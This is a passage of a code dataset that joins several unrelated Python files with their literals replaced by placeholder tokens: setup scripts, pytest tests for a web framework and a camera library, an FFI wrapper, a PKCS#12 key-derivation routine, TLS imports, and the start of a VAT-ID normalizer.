"<STR_LIT:url>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT:email>" , <EOL> zip_safe = True , <EOL> scripts = [ "<STR_LIT>" ] , <EOL> py_modules = [ "<STR_LIT>" ] , <EOL> cmdclass = commands , <EOL> ) </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> from distribute_setup import use_setuptools <EOL> use_setuptools ( ) <EOL> from setuptools import setup <EOL> import repositories <EOL> try : <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) <EOL> except IOError : <EOL> long_description = '<STR_LIT>' <EOL> setup ( name = '<STR_LIT>' , <EOL> version = repositories . __version__ , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , ] , <EOL> include_package_data = True , <EOL> classifiers = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from pytest import raises <EOL> from watson . di . container import IocContainer <EOL> from watson . framework import applications , config , exceptions <EOL> from watson . common . datastructures import module_to_dict <EOL> from watson . http . messages import Request <EOL> from tests . watson . framework . support import sample_environ , start_response , SampleNonStringCommand <EOL> from tests . watson . framework import sample_config <EOL> class TestBaseApplication ( object ) : <EOL> def test_call ( self ) : <EOL> with raises ( TypeError ) : <EOL> applications . Base ( ) <EOL> class TestHttpApplication ( object ) : <EOL> def test_create ( self ) : <EOL> application = applications . Http ( ) <EOL> assert isinstance ( application . container , IocContainer ) <EOL> assert application . config == module_to_dict ( config , '<STR_LIT>' ) <EOL> application_module = applications . Http ( sample_config ) <EOL> assert application_module . config [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> def test_call ( self ) : <EOL> application = applications . Http ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:path>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:blank>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : True <EOL> } <EOL> } ) <EOL> environ = sample_environ ( PATH_INFO = '<STR_LIT:/>' , <EOL> REQUEST_METHOD = '<STR_LIT:POST>' , <EOL> HTTP_ACCEPT = '<STR_LIT:application/json>' ) <EOL> response = application ( environ , start_response ) <EOL> assert response == [ b'<STR_LIT>' ] <EOL> def test_raise_exception_event_not_found ( self ) : <EOL> application = applications . Http ( ) <EOL> response = application ( sample_environ ( PATH_INFO = '<STR_LIT:/>' ) , start_response ) <EOL> assert '<STR_LIT>' in response [ <NUM_LIT:0> ] . decode ( '<STR_LIT:utf-8>' ) <EOL> def test_raise_exception_event_server_error ( self ) : <EOL> application = applications . Http ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:path>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> } ) <EOL> response = application ( sample_environ ( PATH_INFO = '<STR_LIT:/>' ) , start_response ) <EOL> assert '<STR_LIT>' in response [ <NUM_LIT:0> ] . decode ( '<STR_LIT:utf-8>' ) <EOL> def test_application_logic_error ( self ) : <EOL> application = applications . Http ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:path>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:action>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT:blank>' <EOL> } <EOL> } <EOL> } ) <EOL> response = application ( sample_environ ( PATH_INFO = '<STR_LIT:/>' ) , start_response ) <EOL> assert '<STR_LIT>' in response [ <NUM_LIT:0> ] . decode ( '<STR_LIT:utf-8>' ) <EOL> def test_no_exception_class ( self ) : <EOL> app = applications . Http ( { '<STR_LIT>' : None } ) <EOL> assert app . exception_class is exceptions . ApplicationError <EOL> def test_no_dispatcher_render ( self ) : <EOL> with raises ( KeyError ) : <EOL> app = applications . Http ( ) <EOL> app . render ( with_dispatcher = False ) <EOL> def test_last_exception ( self ) : <EOL> environ = sample_environ ( ) <EOL> context = { <EOL> '<STR_LIT>' : Request . from_environ ( environ ) <EOL> } <EOL> app = applications . Http ( ) <EOL> response , view_model = app . exception ( <EOL> last_exception = True , exception = Exception ( '<STR_LIT:test>' ) , context = context ) <EOL> assert '<STR_LIT>' in response . body <EOL> class TestConsoleApplication ( object ) : <EOL> def test_create ( self ) : <EOL> application = applications . Console ( ) <EOL> assert isinstance ( application . container , IocContainer ) <EOL> def test_register_commands ( self ) : <EOL> application = applications . Console ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> SampleNonStringCommand ] <EOL> } ) <EOL> assert len ( application . config [ '<STR_LIT>' ] ) == <NUM_LIT:4> <EOL> def test_execute_command ( self ) : <EOL> application = applications . Console ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> SampleNonStringCommand ] <EOL> } ) <EOL> assert application ( [ '<STR_LIT>' , '<STR_LIT:string>' , '<STR_LIT>' ] ) == '<STR_LIT>' <EOL> assert not application . get_command ( '<STR_LIT:test>' ) </s>
<s> import os <EOL> from watson . console import command <EOL> from watson . console . decorators import arg <EOL> from watson . common . imports import load_definition_from_string <EOL> from watson . di import ContainerAware <EOL> from watson . dev . server import make_dev_server <EOL> class Dev ( command . Base , ContainerAware ) : <EOL> """<STR_LIT>""" <EOL> @ arg ( '<STR_LIT:host>' , optional = True ) <EOL> @ arg ( '<STR_LIT:port>' , optional = True ) <EOL> @ arg ( '<STR_LIT>' , optional = True , default = False ) <EOL> def runserver ( self , host , port , noreload ) : <EOL> """<STR_LIT>""" <EOL> app_dir = os . environ [ '<STR_LIT>' ] <EOL> app_module = os . environ [ '<STR_LIT>' ] <EOL> script_dir = os . environ [ '<STR_LIT>' ] <EOL> public_dir = os . environ [ '<STR_LIT>' ] <EOL> os . chdir ( app_dir ) <EOL> app = load_definition_from_string ( '<STR_LIT>' . format ( <EOL> app_module ) ) <EOL> kwargs = { <EOL> '<STR_LIT>' : app , <EOL> '<STR_LIT>' : script_dir , <EOL> '<STR_LIT>' : public_dir , <EOL> } <EOL> if host : <EOL> kwargs [ '<STR_LIT:host>' ] = host <EOL> if port : <EOL> kwargs [ '<STR_LIT:port>' ] = int ( port ) <EOL> kwargs [ '<STR_LIT>' ] = True if noreload else False <EOL> make_dev_server ( ** kwargs ) </s>
<s> from __future__ import ( <EOL> unicode_literals , <EOL> print_function , <EOL> division , <EOL> absolute_import , <EOL> ) <EOL> str = type ( '<STR_LIT>' ) <EOL> import ctypes as ct <EOL> import picamera . mmal as mmal <EOL> import picamera <EOL> import pytest <EOL> import mock <EOL> def test_camera_init ( ) : <EOL> with mock . patch ( '<STR_LIT>' ) as bcm_host , mock . patch ( '<STR_LIT>' ) as mmal , mock . patch ( '<STR_LIT>' ) as ct : <EOL> mmal . mmal_component_create . return_value = <NUM_LIT:1> <EOL> with pytest . raises ( picamera . PiCameraError ) as e : <EOL> picamera . PiCamera ( ) <EOL> assert e . value . args [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) <EOL> mmal . mmal_component_create . return_value = <NUM_LIT:0> <EOL> ct . POINTER . return_value . return_value [ <NUM_LIT:0> ] . output_num = <NUM_LIT:0> <EOL> ct . sizeof . return_value = <NUM_LIT:0> <EOL> with pytest . raises ( picamera . PiCameraError ) as e : <EOL> picamera . PiCamera ( ) <EOL> assert e . value . args [ <NUM_LIT:0> ] == "<STR_LIT>" <EOL> ct . POINTER . return_value . return_value [ <NUM_LIT:0> ] . output_num = <NUM_LIT:3> <EOL> mmal . mmal_port_parameter_set . side_effect = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> with pytest . raises ( picamera . PiCameraError ) as e : <EOL> picamera . PiCamera ( ) <EOL> assert e . value . args [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) <EOL> mmal . mmal_port_parameter_set . side_effect = None <EOL> mmal . mmal_port_parameter_set . return_value = <NUM_LIT:0> <EOL> mmal . mmal_port_enable . return_value = <NUM_LIT:1> <EOL> with pytest . raises ( picamera . PiCameraError ) as e : <EOL> picamera . PiCamera ( ) <EOL> assert e . value . args [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) <EOL> mmal . mmal_port_enable . return_value = <NUM_LIT:0> <EOL> mmal . mmal_port_format_commit . return_value = <NUM_LIT:0> <EOL> for p in picamera . PiCamera . CAMERA_PORTS : <EOL> ct . POINTER . return_value . return_value [ <NUM_LIT:0> ] . output [ p ] [ <NUM_LIT:0> ] . buffer_num = <NUM_LIT:1> <EOL> mmal . mmal_component_enable . return_value = <NUM_LIT:1> <EOL> with pytest . raises ( picamera . PiCameraError ) as e : <EOL> picamera . PiCamera ( ) <EOL> assert e . value . args [ <NUM_LIT:0> ] . startswith ( "<STR_LIT>" ) <EOL> def test_camera_led ( ) : <EOL> with mock . patch ( '<STR_LIT>' ) as GPIO : <EOL> GPIO . RPI_REVISION = <NUM_LIT:1> <EOL> with picamera . PiCamera ( ) as camera : <EOL> camera . led = True <EOL> GPIO . setmode . assert_called_once_with ( GPIO . BCM ) <EOL> GPIO . setup . assert_called_once_with ( <NUM_LIT:5> , GPIO . OUT , initial = GPIO . LOW ) <EOL> GPIO . output . assert_called_with ( <NUM_LIT:5> , True ) <EOL> camera . led = False <EOL> GPIO . output . assert_called_with ( <NUM_LIT:5> , False ) <EOL> with pytest . raises ( AttributeError ) : <EOL> camera . led </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals , division , absolute_import , print_function <EOL> import sys <EOL> from . _types import str_cls , byte_cls , int_types , bytes_to_list <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:null>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> try : <EOL> from cffi import FFI <EOL> _ffi_registry = { } <EOL> ffi = FFI ( ) <EOL> def register_ffi ( library , ffi_obj ) : <EOL> _ffi_registry [ library ] = ffi_obj <EOL> def _get_ffi ( library ) : <EOL> if library in _ffi_registry : <EOL> return _ffi_registry [ library ] <EOL> return ffi <EOL> def buffer_from_bytes ( initializer ) : <EOL> return ffi . new ( '<STR_LIT>' , initializer ) <EOL> def buffer_from_unicode ( initializer ) : <EOL> return ffi . new ( '<STR_LIT>' , initializer ) <EOL> def write_to_buffer ( buffer , data , offset = <NUM_LIT:0> ) : <EOL> buffer [ offset : offset + len ( data ) ] = data <EOL> def buffer_pointer ( buffer ) : <EOL> return ffi . new ( '<STR_LIT>' , [ buffer ] ) <EOL> def cast ( library , type_ , value ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> return ffi_obj . cast ( type_ , value ) <EOL> def sizeof ( library , value ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> return ffi_obj . sizeof ( value ) <EOL> def bytes_from_buffer ( buffer , maxlen = None ) : <EOL> if maxlen is not None : <EOL> return ffi . buffer ( buffer , maxlen ) [ : ] <EOL> return ffi . buffer ( buffer ) [ : ] <EOL> def byte_string_from_buffer ( buffer ) : <EOL> return ffi . string ( buffer ) <EOL> def byte_array ( byte_string ) : <EOL> return byte_string <EOL> def pointer_set ( pointer_ , value ) : <EOL> pointer_ [ <NUM_LIT:0> ] = value <EOL> def array_set ( array , value ) : <EOL> for index , val in enumerate ( value ) : <EOL> array [ index ] = val <EOL> def null ( ) : <EOL> return ffi . NULL <EOL> def is_null ( point ) : <EOL> if point is None : <EOL> return True <EOL> if point == ffi . NULL : <EOL> return True <EOL> if ffi . getctype ( ffi . typeof ( point ) ) == '<STR_LIT>' : <EOL> return False <EOL> if point [ <NUM_LIT:0> ] == ffi . NULL : <EOL> return True <EOL> return False <EOL> def errno ( ) : <EOL> return ffi . errno <EOL> def new ( library , type_ , value = None ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> params = [ ] <EOL> if value is not None : <EOL> params . append ( value ) <EOL> if type_ in set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> return ffi_obj . cast ( type_ , <NUM_LIT:0> ) <EOL> return ffi_obj . new ( type_ , * params ) <EOL> def ref ( value , offset = <NUM_LIT:0> ) : <EOL> return value + offset <EOL> def native ( type_ , value ) : <EOL> if type_ == str_cls : <EOL> return ffi . string ( value ) <EOL> if type_ == byte_cls : <EOL> return ffi . buffer ( value ) [ : ] <EOL> return type_ ( value ) <EOL> def deref ( point ) : <EOL> return point [ <NUM_LIT:0> ] <EOL> def unwrap ( point ) : <EOL> return point [ <NUM_LIT:0> ] <EOL> def struct ( library , name ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> return ffi_obj . new ( '<STR_LIT>' % name ) <EOL> def struct_bytes ( struct_ ) : <EOL> return ffi . buffer ( struct_ ) [ : ] <EOL> def struct_from_buffer ( library , name , buffer ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> new_struct_pointer = ffi_obj . new ( '<STR_LIT>' % name ) <EOL> new_struct = new_struct_pointer [ <NUM_LIT:0> ] <EOL> struct_size = sizeof ( library , new_struct ) <EOL> struct_buffer = ffi_obj . buffer ( new_struct_pointer ) <EOL> struct_buffer [ : ] = ffi_obj . buffer ( buffer , struct_size ) [ : ] <EOL> return new_struct_pointer <EOL> def array_from_pointer ( library , name , point , size ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> array = ffi_obj . cast ( '<STR_LIT>' % ( name , size ) , point ) <EOL> total_bytes = ffi_obj . sizeof ( array ) <EOL> if total_bytes == <NUM_LIT:0> : <EOL> return [ ] <EOL> output = [ ] <EOL> string_types = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> string_type = name in string_types <EOL> for i in range ( <NUM_LIT:0> , size ) : <EOL> value = array [ i ] <EOL> if string_type : <EOL> value = ffi_obj . string ( value ) <EOL> output . append ( value ) <EOL> return output <EOL> def callback ( library , signature_name , func ) : <EOL> ffi_obj = _get_ffi ( library ) <EOL> return ffi_obj . callback ( signature_name , func ) <EOL> engine = '<STR_LIT>' <EOL> except ( ImportError ) : <EOL> import ctypes <EOL> from ctypes import pointer , c_int , c_char_p , c_uint , c_void_p , c_wchar_p <EOL> _pointer_int_types = int_types + ( c_char_p , ctypes . POINTER ( ctypes . c_byte ) ) <EOL> _pointer_types = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> _type_map = { <EOL> '<STR_LIT>' : c_void_p , <EOL> '<STR_LIT>' : c_wchar_p , <EOL> '<STR_LIT>' : c_char_p , <EOL> '<STR_LIT:int>' : c_int , <EOL> '<STR_LIT>' : c_uint , <EOL> '<STR_LIT>' : ctypes . c_size_t , <EOL> '<STR_LIT>' : ctypes . c_uint32 , <EOL> } <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> from ctypes import wintypes <EOL> _pointer_types . update ( { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } ) <EOL> _type_map . update ( { <EOL> '<STR_LIT>' : c_char_p , <EOL> '<STR_LIT>' : c_wchar_p , <EOL> '<STR_LIT>' : c_char_p , <EOL> '<STR_LIT>' : c_wchar_p , <EOL> '<STR_LIT>' : wintypes . ULONG , <EOL> '<STR_LIT>' : wintypes . DWORD , <EOL> '<STR_LIT>' : ctypes . POINTER ( ctypes . c_byte ) , <EOL> } ) <EOL> def _type_info ( library , type_ ) : <EOL> is_double_pointer = type_ [ - <NUM_LIT:3> : ] == '<STR_LIT>' <EOL> if is_double_pointer : <EOL> type_ = type_ [ : - <NUM_LIT:1> ] <EOL> is_pointer = type_ [ - <NUM_LIT:2> : ] == '<STR_LIT>' and type_ not in _pointer_types <EOL> if is_pointer : <EOL> type_ = type_ [ : - <NUM_LIT:2> ] <EOL> is_array = type_ . find ( '<STR_LIT:[>' ) != - <NUM_LIT:1> <EOL> if is_array : <EOL> is_array = type_ [ type_ . find ( '<STR_LIT:[>' ) + <NUM_LIT:1> : type_ . find ( '<STR_LIT:]>' ) ] <EOL> if is_array == '<STR_LIT>' : <EOL> is_array = True <EOL> else : <EOL> is_array = int ( is_array ) <EOL> type_ = type_ [ <NUM_LIT:0> : type_ . find ( '<STR_LIT:[>' ) ] <EOL> if type_ in _type_map : <EOL> type_ = _type_map [ type_ ] <EOL> else : <EOL> type_ = getattr ( library , type_ ) <EOL> if is_double_pointer : <EOL> type_ = ctypes . POINTER ( type_ ) <EOL> return ( is_pointer , is_array , type_ ) <EOL> def register_ffi ( library , ffi_obj ) : <EOL> pass <EOL> def buffer_from_bytes ( initializer ) : <EOL> return ctypes . create_string_buffer ( initializer ) <EOL> def buffer_from_unicode ( initializer ) : <EOL> return ctypes . create_unicode_buffer ( initializer ) <EOL> def write_to_buffer ( buffer , data , offset = <NUM_LIT:0> ) : <EOL> if isinstance ( buffer , ctypes . POINTER ( ctypes . c_byte ) ) : <EOL> ctypes . memmove ( buffer , data , len ( data ) ) <EOL> return <EOL> if offset == <NUM_LIT:0> : <EOL> buffer . value = data <EOL> else : <EOL> buffer . value = buffer . raw [ <NUM_LIT:0> : offset ] + data <EOL> def buffer_pointer ( buffer ) : <EOL> return pointer ( ctypes . cast ( buffer , c_char_p ) ) <EOL> def cast ( library , type_ , value ) : <EOL> is_pointer , is_array , type_ = _type_info ( library , type_ ) <EOL> if is_pointer : <EOL> type_ = ctypes . POINTER ( type_ ) <EOL> elif is_array : <EOL> type_ = type_ * is_array <EOL> return ctypes . cast ( value , type_ ) <EOL> def sizeof ( library , value ) : <EOL> return ctypes . sizeof ( value ) <EOL> def bytes_from_buffer ( buffer , maxlen = None ) : <EOL> if isinstance ( buffer , _pointer_int_types ) : <EOL> return ctypes . string_at ( buffer , maxlen ) <EOL> if maxlen is not None : <EOL> return buffer . raw [ <NUM_LIT:0> : maxlen ] <EOL> return buffer . raw <EOL> def byte_string_from_buffer ( buffer ) : <EOL> return buffer . value <EOL> def byte_array ( byte_string ) : <EOL> return ( ctypes . c_byte * len ( byte_string ) ) ( * bytes_to_list ( byte_string ) ) <EOL> def pointer_set ( pointer_ , value ) : <EOL> pointer_ . contents . value = value <EOL> def array_set ( array , value ) : <EOL> for index , val in enumerate ( value ) : <EOL> array [ index ] = val <EOL> def null ( ) : <EOL> return None <EOL> def is_null ( point ) : <EOL> return not bool ( point ) <EOL> def errno ( ) : <EOL> return ctypes . get_errno ( ) <EOL> def new ( library , type_ , value = None ) : <EOL> is_pointer , is_array , type_ = _type_info ( library , type_ ) <EOL> if is_array : <EOL> if is_array is True : <EOL> type_ = type_ * value <EOL> value = None <EOL> else : <EOL> type_ = type_ * is_array <EOL> params = [ ] <EOL> if value is not None : <EOL> params . append ( value ) <EOL> output = type_ ( * params ) <EOL> if is_pointer : <EOL> output = pointer ( output ) <EOL> return output <EOL> def ref ( value , offset = <NUM_LIT:0> ) : <EOL> return ctypes . cast ( ctypes . addressof ( value ) + offset , ctypes . POINTER ( ctypes . c_byte ) ) <EOL> def native ( type_ , value ) : <EOL> if isinstance ( value , type_ ) : <EOL> return value <EOL> if sys . version_info < ( <NUM_LIT:3> , ) and type_ == int and isinstance ( value , int_types ) : <EOL> return value <EOL> if isinstance ( value , ctypes . Array ) and value . _type_ == ctypes . c_byte : <EOL> return ctypes . string_at ( ctypes . addressof ( value ) , value . _length_ ) <EOL> return type_ ( value . value ) <EOL> def deref ( point ) : <EOL> return point [ <NUM_LIT:0> ] <EOL> def unwrap ( point ) : <EOL> return point . contents <EOL> def struct ( library , name ) : <EOL> return pointer ( getattr ( library , name ) ( ) ) <EOL> def struct_bytes ( struct_ ) : <EOL> return ctypes . string_at ( struct_ , ctypes . sizeof ( struct_ . contents ) ) <EOL> def struct_from_buffer ( library , type_ , buffer ) : <EOL> class_ = getattr ( library , type_ ) <EOL> value = class_ ( ) <EOL> ctypes . memmove ( ctypes . addressof ( value ) , buffer , ctypes . sizeof ( class_ ) ) <EOL> return ctypes . pointer ( value ) <EOL> def array_from_pointer ( library , type_ , point , size ) : <EOL> _ , _ , type_ = _type_info ( library , type_ ) <EOL> array = ctypes . cast ( point , ctypes . POINTER ( type_ ) ) <EOL> output = [ ] <EOL> for i in range ( <NUM_LIT:0> , size ) : <EOL> output . append ( array [ i ] ) <EOL> return output <EOL> def callback ( library , signature_type , func ) : <EOL> return getattr ( library , signature_type ) ( func ) <EOL> engine = '<STR_LIT>' <EOL> class LibraryNotFoundError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FFIEngineError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> from __future__ import unicode_literals , division , absolute_import , print_function <EOL> import sys <EOL> import hashlib <EOL> import math <EOL> from asn1crypto . util import int_from_bytes , int_to_bytes <EOL> from . _errors import pretty_message <EOL> from . _types import type_name , byte_cls , int_types <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> chr_cls = chr <EOL> else : <EOL> def chr_cls ( num ) : <EOL> return bytes ( [ num ] ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> def pkcs12_kdf ( hash_algorithm , password , salt , iterations , key_length , id_ ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( password , byte_cls ) : <EOL> raise TypeError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> type_name ( password ) <EOL> ) ) <EOL> if not isinstance ( salt , byte_cls ) : <EOL> raise TypeError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> type_name ( salt ) <EOL> ) ) <EOL> if not isinstance ( iterations , int_types ) : <EOL> raise TypeError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> type_name ( iterations ) <EOL> ) ) <EOL> if iterations < <NUM_LIT:1> : <EOL> raise ValueError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> repr ( iterations ) <EOL> ) ) <EOL> if not isinstance ( key_length , int_types ) : <EOL> raise TypeError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> type_name ( key_length ) <EOL> ) ) <EOL> if key_length < <NUM_LIT:1> : <EOL> raise ValueError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> repr ( key_length ) <EOL> ) ) <EOL> if hash_algorithm not in set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> raise ValueError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> repr ( hash_algorithm ) <EOL> ) ) <EOL> if id_ not in set ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) : <EOL> raise ValueError ( pretty_message ( <EOL> '''<STR_LIT>''' , <EOL> repr ( id_ ) <EOL> ) ) <EOL> utf16_password = password . decode ( '<STR_LIT:utf-8>' ) . encode ( '<STR_LIT>' ) + b'<STR_LIT>' <EOL> algo = getattr ( hashlib , hash_algorithm ) <EOL> u = { <EOL> '<STR_LIT>' : <NUM_LIT:16> , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:32> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:64> <EOL> } [ hash_algorithm ] <EOL> if hash_algorithm in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> v = <NUM_LIT> <EOL> else : <EOL> v = <NUM_LIT:64> <EOL> d = chr_cls ( id_ ) * v <EOL> s = b'<STR_LIT>' <EOL> if salt != b'<STR_LIT>' : <EOL> s_len = v * int ( math . ceil ( float ( len ( salt ) ) / v ) ) <EOL> while len ( s ) < s_len : <EOL> s += salt <EOL> s = s [ <NUM_LIT:0> : s_len ] <EOL> p = b'<STR_LIT>' <EOL> if utf16_password != b'<STR_LIT>' : <EOL> p_len = v * int ( math . ceil ( float ( len ( utf16_password ) ) / v ) ) <EOL> while len ( p ) < p_len : <EOL> p += utf16_password <EOL> p = p [ <NUM_LIT:0> : p_len ] <EOL> i = s + p <EOL> c = int ( math . ceil ( float ( key_length ) / u ) ) <EOL> a = b'<STR_LIT:\x00>' * ( c * u ) <EOL> for num in range ( <NUM_LIT:1> , c + <NUM_LIT:1> ) : <EOL> a2 = algo ( d + i ) . digest ( ) <EOL> for _ in range ( <NUM_LIT:2> , iterations + <NUM_LIT:1> ) : <EOL> a2 = algo ( a2 ) . digest ( ) <EOL> if num < c : <EOL> b = b'<STR_LIT>' <EOL> while len ( b ) < v : <EOL> b += a2 <EOL> b = int_from_bytes ( b [ <NUM_LIT:0> : v ] ) + <NUM_LIT:1> <EOL> for num2 in range ( <NUM_LIT:0> , len ( i ) // v ) : <EOL> start = num2 * v <EOL> end = ( num2 + <NUM_LIT:1> ) * v <EOL> i_num2 = i [ start : end ] <EOL> i_num2 = int_to_bytes ( int_from_bytes ( i_num2 ) + b ) <EOL> i_num2_l = len ( i_num2 ) <EOL> if i_num2_l > v : <EOL> i_num2 = i_num2 [ i_num2_l - v : ] <EOL> i = i [ <NUM_LIT:0> : start ] + i_num2 + i [ end : ] <EOL> begin = ( num - <NUM_LIT:1> ) * u <EOL> to_copy = min ( key_length , u ) <EOL> a = a [ <NUM_LIT:0> : begin ] + a2 [ <NUM_LIT:0> : to_copy ] + a [ begin + to_copy : ] <EOL> return a [ <NUM_LIT:0> : key_length ] </s>
<s> from __future__ import unicode_literals , division , absolute_import , print_function <EOL> import sys <EOL> if sys . platform == '<STR_LIT>' : <EOL> from . _osx . tls import ( <EOL> TLSSession , <EOL> TLSSocket , <EOL> ) <EOL> elif sys . platform == '<STR_LIT:win32>' : <EOL> from . _win . tls import ( <EOL> TLSSession , <EOL> TLSSocket , <EOL> ) <EOL> else : <EOL> from . _openssl . tls import ( <EOL> TLSSession , <EOL> TLSSocket , <EOL> ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> import json <EOL> from xml . etree import ElementTree <EOL> import cgi <EOL> try : <EOL> from urllib . request import Request , urlopen <EOL> from urllib . error import HTTPError <EOL> str_cls = str <EOL> except ( ImportError ) : <EOL> from urllib2 import Request , urlopen , HTTPError <EOL> str_cls = unicode <EOL> from . errors import InvalidError , WebServiceError , WebServiceUnavailableError <EOL> def normalize ( vat_id ) : <EOL> """<STR_LIT>""" <EOL> if not vat_id : <EOL> return None <EOL> if not isinstance ( vat_id , str_cls ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if len ( vat_id ) < <NUM_LIT:3> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> vat_id = re . sub ( '<STR_LIT>' , '<STR_LIT>' , vat_id ) <EOL> vat_id = vat_id . replace ( '<STR_LIT:->' , '<STR_LIT>' ) <EOL> vat_id = vat_id . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> vat_id = vat_id . upper ( ) <EOL> country_prefix = vat_id [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> if country_prefix == '<STR_LIT>' : <EOL> vat_id = '<STR_LIT>' + vat_id [ <NUM_LIT:2> : ] <EOL> country_prefix = '<STR_LIT>' 